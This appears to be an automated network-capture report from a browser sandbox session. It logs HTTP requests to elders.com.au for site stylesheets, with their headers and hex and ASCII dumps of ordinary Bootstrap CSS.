                                                                                                                                    Data Ascii: 7d40:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a4
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 2c 32 35 35 2c 32 35 35 2c 30 2e 31 35 29 2c 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 29 7d 0a 2a 2c 2a 3a 3a 62 65 66 6f 72 65 2c 2a 3a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 0a 40 6d 65 64 69 61 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 29 7b 3a 72 6f 6f 74 7b 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 73 6d 6f 6f 74 68 7d 0a 7d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 73 61 6e 73 2d 73 65 72 69 66 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e
                                                                                                                                    Data Ascii: ,255,255,0.15),rgba(255,255,255,0))}*,*::before,*::after{box-sizing:border-box}@media(prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}body{margin:0;font-family:var(--bs-font-sans-serif);font-size:1rem;font-weight:400;line-height:1.
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 72 65 6d 7d 0a 6f 6c 20 6f 6c 2c 75 6c 20 75 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 0a 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 0a 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 0a 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 0a 73 6d 61 6c 6c 2c 2e 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 0a 6d 61 72 6b 2c 2e 6d 61 72 6b 7b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 7d 0a 73 75 62 2c 73 75 70 7b 70 6f 73 69 74
                                                                                                                                    Data Ascii: rem}ol ol,ul ul,ol ul,ul ol{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}small,.small{font-size:.875em}mark,.mark{padding:.2em;background-color:#fcf8e3}sub,sup{posit
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 74 6c 69 6e 65 3a 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 20 61 75 74 6f 20 35 70 78 7d 0a 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 0a 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 0a 5b 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0a 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 0a 5b 6c 69 73 74 5d 3a 3a 2d 77 65 62 6b 69 74 2d
                                                                                                                                    Data Ascii: tline:-webkit-focus-ring-color auto 5px}input,button,select,optgroup,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,select{text-transform:none}[role="button"]{cursor:pointer}select{word-wrap:normal}[list]::-webkit-
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 75 74 74 6f 6e 7d 0a 6f 75 74 70 75 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 0a 69 66 72 61 6d 65 7b 62 6f 72 64 65 72 3a 30 7d 0a 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0a 70 72 6f 67 72 65 73 73 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 0a 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 0a 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 36 32 35 72 65 6d 20 2b 20 34 2e 35 76 77 29 3b 66 6f 6e 74 2d 77 65
                                                                                                                                    Data Ascii: utton}output{display:inline-block}iframe{border:0}summary{display:list-item;cursor:pointer}progress{vertical-align:baseline}[hidden]{display:none !important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-we
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 0a 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 66 6f 6f 74 65 72 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 32 30 31 34 5c 30 30 41 30 22 7d 0a 2e 69 6d 67 2d 66 6c 75 69 64 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 0a 2e 69 6d 67 2d 74 68 75 6d 62 6e 61 69 6c 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a
                                                                                                                                    Data Ascii: in-bottom:1rem;font-size:.875em;color:#6c757d}.blockquote-footer::before{content:"\2014\00A0"}.img-fluid{max-width:100%;height:auto}.img-thumbnail{padding:.25rem;background-color:#fff;border:1px solid #dee2e6;border-radius:.25rem;max-width:100%;height:
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2f 20 32 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 29 20 2f 20 32 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 29 7d 0a 2e 63 6f 6c 7b 66 6c 65 78 3a 31 20 30 20 30 7d 0a 2e 72 6f 77 2d 63 6f 6c 73 2d 61 75 74 6f 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 0a 2e 72 6f 77 2d 63 6f 6c 73 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 72 6f 77 2d 63 6f 6c 73 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 0a 2e
                                                                                                                                    Data Ascii: adding-right:calc(var(--bs-gutter-x) / 2);padding-left:calc(var(--bs-gutter-x) / 2);margin-top:var(--bs-gutter-y)}.col{flex:1 0 0}.row-cols-auto>*{flex:0 0 auto;width:auto}.row-cols-1>*{flex:0 0 auto;width:100%}.row-cols-2>*{flex:0 0 auto;width:50%}.
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 2e 35 72 65 6d 7d 0a 2e 67 2d 32 2c 2e 67 79 2d 32 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 2e 35 72 65 6d 7d 0a 2e 67 2d 33 2c 2e 67 78 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 72 65 6d 7d 0a 2e 67 2d 33 2c 2e 67 79 2d 33 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 72 65 6d 7d 0a 2e 67 2d 34 2c 2e 67 78 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 0a 2e 67 2d 34 2c 2e 67 79 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 0a 2e 67 2d 35 2c 2e 67 78 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 0a 2e 67 2d 35 2c 2e 67 79 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 0a 40 6d 65 64 69 61 28 6d 69
                                                                                                                                    Data Ascii: -2{--bs-gutter-x:.5rem}.g-2,.gy-2{--bs-gutter-y:.5rem}.g-3,.gx-3{--bs-gutter-x:1rem}.g-3,.gy-3{--bs-gutter-y:1rem}.g-4,.gx-4{--bs-gutter-x:1.5rem}.g-4,.gy-4{--bs-gutter-y:1.5rem}.g-5,.gx-5{--bs-gutter-x:3rem}.g-5,.gy-5{--bs-gutter-y:3rem}@media(mi
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 2e 33 33 33 33 33 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 37 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 33 2e 33 33 33 33 33 25 7d 0a 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 39 31 2e 36 36 36 36 37 25 7d 0a 2e 67 2d 73 6d 2d 30 2c 2e 67 78 2d 73 6d 2d 30 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 30 7d 0a 2e 67 2d 73 6d 2d 30 2c 2e 67 79 2d 73 6d 2d 30 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 7d 0a 2e 67 2d 73 6d 2d 31 2c 2e 67 78 2d 73 6d 2d 31 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 2e 32 35 72 65 6d 7d
                                                                                                                                    Data Ascii: .33333%}.offset-sm-8{margin-left:66.66667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.33333%}.offset-sm-11{margin-left:91.66667%}.g-sm-0,.gx-sm-0{--bs-gutter-x:0}.g-sm-0,.gy-sm-0{--bs-gutter-y:0}.g-sm-1,.gx-sm-1{--bs-gutter-x:.25rem}
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 69 64 74 68 3a 38 33 2e 33 33 33 33 33 25 7d 0a 2e 63 6f 6c 2d 6d 64 2d 31 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 39 31 2e 36 36 36 36 37 25 7d 0a 2e 63 6f 6c 2d 6d 64 2d 31 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 2e 33 33 33 33 33 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 37 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 0a 2e 6f 66 66 73 65 74 2d 6d 64 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33
                                                                                                                                    Data Ascii: idth:83.33333%}.col-md-11{flex:0 0 auto;width:91.66667%}.col-md-12{flex:0 0 auto;width:100%}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.33333%}.offset-md-2{margin-left:16.66667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.333


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    47192.168.2.449812162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC660OUTGET /etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.css HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:17 UTC584INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/css;charset=utf-8
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    cache-control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Fri, 23 Feb 2024 00:15:07 GMT
                                                                                                                                    etag: W/"0-2386f26fb1bdc0"
                                                                                                                                    x-vhost: publish
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Age: 355155
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-dfw-kdfw8210025-DFW
                                                                                                                                    X-Cache: HIT
                                                                                                                                    X-Timer: S1709612817.573046,VS0,VS0,VE6
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53933cb74648-DFW


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    48192.168.2.449813162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:17 UTC652OUTGET /etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:17 UTC614INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:17 GMT
                                                                                                                                    Content-Type: text/css;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Thu, 17 Oct 2024 04:33:46 GMT
                                                                                                                                    etag: W/"6951d-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-pao-kpao1770043-PAO
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1729139626.705267,VS0,VS0,VE848
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1654171
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53933c3ee8fd-DFW
                                                                                                                                    2024-11-05 08:03:17 UTC755INData Raw: 37 64 33 38 0d 0a 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d 2d 62 73 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d 62 73 2d 70 75 72 70 6c 65 3a 23 36 66 34 32 63 31 3b 2d 2d 62 73 2d 70 69 6e 6b 3a 23 64 36 33 33 38 34 3b 2d 2d 62 73 2d 72 65 64 3a 23 64 63 33 35 34 35 3b 2d 2d 62 73 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 62 73 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 62 73 2d 67 72 65 65 6e 3a 23 31 39 38 37 35 34 3b 2d 2d 62 73 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 62 73 2d 63 79 61 6e 3a 23 30 64 63 61 66 30 3b 2d 2d 62 73 2d 77 68 69 74 65 3a 23 66 66 66 3b 2d 2d 62 73 2d 67 72 61 79 3a 23 36 63 37 35 37 64 3b 2d 2d 62 73 2d 67 72 61 79 2d 64 61 72 6b 3a 23 33 34 33 61 34
                                                                                                                                    Data Ascii: 7d38:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a4
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 31 35 29 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 29 7d 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 6e 6f 2d 70 72 65 66 65 72 65 6e 63 65 29 7b 3a 72 6f 6f 74 7b 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 73 6d 6f 6f 74 68 7d 7d 2e 79 6f 75 69 72 2d 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 20 62 6c 75 65 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63
                                                                                                                                    Data Ascii: hsla(0,0%,100%,.15),hsla(0,0%,100%,0))}*,:after,:before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}.youir-active{border-bottom:2px solid blue}body{-webkit-text-size-adjust:100%;-webkit-tap-highlight-c
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 64 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 64 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 72 65 6d 7d 62 2c 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 65 72 7d 2e 73 6d 61 6c 6c 2c 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 6d 61 72 6b 2c 6d 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 38 65 33 3b 70 61 64 64 69 6e 67 3a 2e 32 65 6d 7d 73 75 62 2c 73 75 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74
                                                                                                                                    Data Ascii: ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}.small,small{font-size:.875em}.mark,mark{background-color:#fcf8e3;padding:.2em}sub,sup{font-size:.75em;line-height:0;posit
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 6c 69 73 74 5d 3a 3a 2d 77 65 62 6b 69 74 2d 63 61 6c 65 6e 64 61 72 2d 70 69 63 6b 65 72 2d 69 6e 64 69 63 61 74 6f 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d
                                                                                                                                    Data Ascii: tarea{font-family:inherit;font-size:inherit;line-height:inherit;margin:0}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[list]::-webkit-calendar-picker-indicator{display:none}[type=button],[type=reset],[type=submit]
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 36 32 35 72 65 6d 20 2b 20 34 2e 35 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 35 37 35 72 65 6d 20 2b 20 33 2e 39 76
                                                                                                                                    Data Ascii: ign:baseline}[hidden]{display:none!important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-1{font-size:5rem}}.display-2{font-size:calc(1.575rem + 3.9v
                                                                                                                                    2024-11-05 08:03:17 UTC1369INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 7d 2e 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 66 69 67 75 72 65 2d 69 6d 67 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 69 67 75 72 65 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6c 67 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63
                                                                                                                                    Data Ascii: nd-color:#fff;border:1px solid #dee2e6;border-radius:.25rem;padding:.25rem}.figure{display:inline-block}.figure-img{line-height:1;margin-bottom:.5rem}.figure-caption{color:#6c757d;font-size:.875em}.container,.container-fluid,.container-lg,.container-md,.c
